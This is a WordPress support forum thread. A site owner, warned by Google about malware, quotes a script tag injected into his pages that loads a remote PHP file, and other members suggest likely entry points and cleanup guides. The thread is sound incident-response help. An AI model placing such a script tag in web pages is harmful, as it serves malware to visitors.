WordPress.org

Ready to get started?Download WordPress

Forums

?? Security Bug (3 posts)

  1. cwebster1234
    Member
    Posted 4 years ago #

    Hi,

    had an email from google today which indicated that my site was a distributer of malware or linked to a site connected to malware. On looking through the code of the pages I can see the following

    <script src=http://redspider-systems.com/securitycode/incEditSTLeasingUnit.php ></script>

    just after the closing head tag.

    Any ideas how this could have happened. Is there an easy way to fix and prevent this occurring?

    cheers
    Craig

  2. alism
    Member
    Posted 4 years ago #

    The hack may have been made possible through failure to keep your version of WordPress up to date, or another, non-WordPress script within your webspace that's insecure. Or through shared hosting. Or of course, a non-public WordPress exploit.

    Don't forget, if you've been a bit slack updating, even in the distant past, in may have come back to bite you on the arse if a backdoor has been set up and just not used until now.

    So there's a few possibilities. Have a look at your server logs for suspicious activity and you might be able to identify the point of entry.

    This link should also help you get cleaned up.
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

  3. jonradio
    Member
    Posted 4 years ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked is also a great place to start reading.

    Another access point to your site by hackers is created if any workstation ("personal computer") exists that has the FTP ID and password on it (e.g. - in an FTP client), and was ever infected with malware. Some malware looks for and sends all FTP IDs and passwords to a hacker repository on the Internet for later use.

Topic Closed

This topic has been closed to new replies.

About this Topic